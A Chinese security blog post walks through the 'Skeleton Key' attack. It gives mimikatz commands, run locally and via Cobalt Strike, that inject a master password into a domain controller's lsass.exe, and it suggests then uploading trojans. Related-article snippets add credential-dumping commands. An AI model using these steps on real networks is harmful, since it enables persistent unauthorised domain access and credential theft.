权限维持 Skeleton-Key

最新推荐文章于 2024-10-11 20:55:35 发布
最新推荐文章于 2024-10-11 20:55:35 发布
阅读量118 收藏 1
点赞数 1
分类专栏: 内网 文章标签: 服务器 运维 经验分享 web安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64815693/article/details/130909807
版权
文章介绍了Skeleton-Key,一种通过mimikatz工具在域控制器上设置默认密码的技术,该密码存储于lsass.exe进程,但重启后失效。攻击者可借此在域环境中进行恶意操作,如上传木马。同时提到了本地执行和通过CS(命令执行)执行两种方式。
摘要由CSDN通过智能技术生成

前言

这里讲的是Skeleton-Key,也可以叫他万能密码,就是在域控制器执行mimikatz给域中所有用户添加一个mimikatz的默认密码,但是他也是注入到内存里面的,就是将Skeleton Key 注入域控(DC)的 lsass.exe进程中,所以重启就会失效,但是通常域控很长时间都不会重启的。

注:限域环境

复现

1.本地

这里是在他本地执行的情况,是将mimikatz.exe上传上去

mimikatz.exe "privilege::debug" "misc::skeleton" exit

这里我们可以,他在本地可以执行,然后我们使用域中的其他主机尝试连接域控。

 

这里看到,我们使用mimikatz的默认密码成功连接域控,接下来不用多说了,上传木马之类都行。

 2.cs执行

假设这里我们已经上线了域控和域中的一台机子

域控执行下列命令,下面看到也是正常执行了,当然有很多插件也是可以的

mimikatz privilege::debug
mimikatz misc::skeleton

这里我们看到域内其他主机也是成功使用mimikatz连接域控

内网渗透(六十八)之域权限维持Skeleton Key
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-12 686
戴尔的安全研究人员在一次威胁涉猎中发现了一种可以在活动目录上绕过的单因素身份验证的方法,该方法使得攻击者在获得域管理员权限或企业管理员权限的情况下,可以在目标域控的LSASS内存中注入特定的密码,然后就可以使用设置的密码来以任何用户身份登录,包括域管理员和企业管理员,而用户还可以使用之前正常的密码进行登录,这种攻击方式被称为Skeleton Key(万能密码)。由于设置Skeleton Key需要域管理员的权限或企业管理员权限,因此这种攻击方式通常用于域权限维持
内网渗透-域内的权限维持
lza20001103的博客
10-01 1063
域内的权限维持 文章目录域内的权限维持前言PTTTGT(黄金票据)sspSkeleton KeySID History后记 前言 上期我们讲了windows和Linux中的权限维持,这期我们讲一下域内的权限维持权限维持是后渗透必不可少的环节,大家一定要好好掌握啊。 PTT PTT(票据) window认证机制 http://note.youdao.com/noteshare?id=cb8c505af1c38b461be8e964e9825dca&sub=F271F9DD1A894C4188D1AE
Mimikatz各模块基本用法
Canterlot的博客
09-04 1835
介绍内网环境中mimikatz各模块最常用功能及用法
内网横向常用手法
weixin_56606020的博客
08-24 1933
内网横向手法
域内权限维持Skeleton Key(万能密码)
01-29 611
01、简介 Skeleton Key(万能密码),是一种可以对域内权限进行持久化的操作,通过将Skeleton Key注入到lsass进程,无需重启域控即可生效,而且能够在不影响当前域用户正常登录的情况下,让所有域用户使用同一个万能密码进行登录,它只存在于内存中,如果域控制器重启,注入的 Skeleton Key 将会失效。 02、利用过程 (1)尝试以当前用户身份,查看当前网络资源的连接为空...
域渗透——Skeleton Key
citelao的博客
03-21 1922
域渗透——Skeleton Key 三好学生 · 2016/02/29 10:24 0x00 前言 上篇介绍了利用SSP来维持域控权限,美中不足在于其需要域控重启才能生效,而在众多的域渗透方法中,当然存在不需要域控重启即能生效的方法,所以这次就介绍其中的一个方法——Skeleton Key 0x01 简介 Skeleton Key被安装在64位的域控服务器上 支
skeleton
weixin_34376562的博客
01-12 152
响应式模版 伯乐在线:http://hao.jobbole.com/skeleton/ cdn : https://cdn.bootcss.com/skeleton/2.0.4/skeleton.css 官网: http://getskeleton.com 转载于:https://www.cnblogs.com/wang715100018066/p/6277413.html...
【域权限维持】-Skeleton Key
qq_41617902的博客
01-20 215
Skeleton Key:能够让所有域用户使用同一个万能密码(默认是mimikatz)进行登录,现有的所有域用户使用原密码仍能继续登录
内网安全-权限维持-黄金白银票据维持&基于登录进程劫持-Skeleton Key&SID history&DSRM&SSP权限维持
weixin_45701675的博客
04-25 876
内网安全权限维持
第8章权限维持分析及防御
willow_liang的博客
12-30 2000
第8章权限维持分析及防御 后门是一个留在目标主机上的软件,它可以使攻击者随时与目标主机进行连接。在大多数情况下,后门是一个运行在目标主机上的隐藏进程。因为后门可能允许一个普通的授权的用户控制计算机,所以攻击者经常使用后门来控制服务器。攻击者在提升权限之后,往往会通过建立后门来维持对目标主机的控制权。这样一来,即使修复了被攻击者利用的系统漏洞,攻击者还是可以通过后门继续控制目标系统。因此如果我们能够了解攻击者在系统中建立后门的方法和思路,就可以在发现系统被人侵后快速找到攻击者留下的后门并将其清除。 .
Skeleton
sssssNian的专栏
05-24 1496
#ifndef SPINE_SKELETON_H_ #define SPINE_SKELETON_H_ #include #include #include namespace cocos2d { namespace extension { typedef struct Skeleton Skeleton; struct Skeleton {
mimikazi教程
tomyyyyy
08-24 2113
目录mimikazi教程1、简介1.1、背景介绍1.2、官方链接1.3、mimikatz 与凭证2、基本使用2.1、常用命令2.2、远程连接使用2.3、本地使用2.4、读取域控成员Hash2.4.1、域控本地读取2.4.2、导出域成员Hash2.4.3、secretsdump脚本直接导出域hash2.5、哈希传递2.5.1、工作组环境2.5.2 域环境2.6 票据传递攻击(PTT)2.6.1 黄...
内网渗透中mimikatz的使用
热门推荐
pyphrb的博客
07-28 4万+
0x01 简介mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单0x02 测试环境网络资源管理模式:域 已有资源:域内一台主机权限 操作系统:win7 x64 域权限:普通用户0x03 测试目标1、获得域控权限 2、导出所有用户口令 3、维持域控权限0x04 测试过程1、获取本机信息mimikatz:privilege::debug sekurlsa::logonpas
windows Mimikatz使用方法
weixin_30657999的博客
02-21 723
Windows - Mimikatz Mimikatz - Execute commands Only one command PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit Mimikatz console (multiple commands) ...
安全研究】从mimikatz学习万能密码——上
HBohan的博客
10-23 522
1.背景介绍 2015年1月2日,Dell Secureworks共享了一份关于利用专用域控制器(DC)恶意软件(名为“SkeletonKey”恶意软件)进行高级攻击活动的报告,SkeletonKey恶意软件修改了DC的身份验证流程,域用户仍然可以使用其用户名和密码登录,攻击者可以使用Skeleton Key密码作为任何域用户登录 【资料查看】 (http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key-malware
域渗透|域权限维持Skeleton Key
weixin_42282189的博客
09-06 605
作者:作者: r0n1n 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 Skeleton Key(万能密码)方法可以对域内管理员权限进行持久化操作,使用mimikatz完成注入Skeleon Key的操作,将 Skeleton Key注入域控制器的lsass.exe进程。 0x01 测试环境 1、域名:god.com 2、域控制器: 主机名:WIN-2008dc IP地址:10.10.10.30 用户名:administrator 密码:123.com 3、域.
查看域用户密码_Skeleton Key(万能密码)对域内权限维持
weixin_39756445的博客
12-13 3409
渗透攻击红队一个专注于红队攻击的公众号大家好,这里是渗透攻击红队的第 39 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更Skeleton Key使用 Skeleton Key(万能密码),可以对域内权限进行持久化操作。使用 mimikatz 完成注入 Skeleon Key 的操作,将 Skeleton Key 注入域控制器的 lsass.exe ...
网络编程(18)——使用asio协程实现并发服务器
最新发布
m0_63086198的博客
10-11 942
通过协程实现并发服务器可大大减少代码量,相比异步编程更加直观,但受限于平台,目前C++20的协程说是协程库,实际上只是开放了无栈协程的协议,正儿八经的官方协程还未发布。use_awaitable,使异步函数通过同步方式写出来,在一个函数中进行数据的粘包处理、网络序列-本地序列转换、序列化处理,并将消息投递至逻辑队列。,并在操作完成时恢复。信号处理,当遇到退出信号(ctrl+c或强制终止信号)时,执行lambd函数,停止ioc的运行。同理,异步写函数也以同步的方式使用,不需要显示bind回调函数,
el-skeleton-item 设置高度
05-31
element-plus 骨架屏中每一项的高度可以通过 el-skeleton-item 组件的 height 属性来设置。height 属性支持以下类型的值: - Number:设置固定高度值,如 height="50" - String:设置高度的百分比,如 height="50%...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

练习两年半的篮球选..哦不对安全选手

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值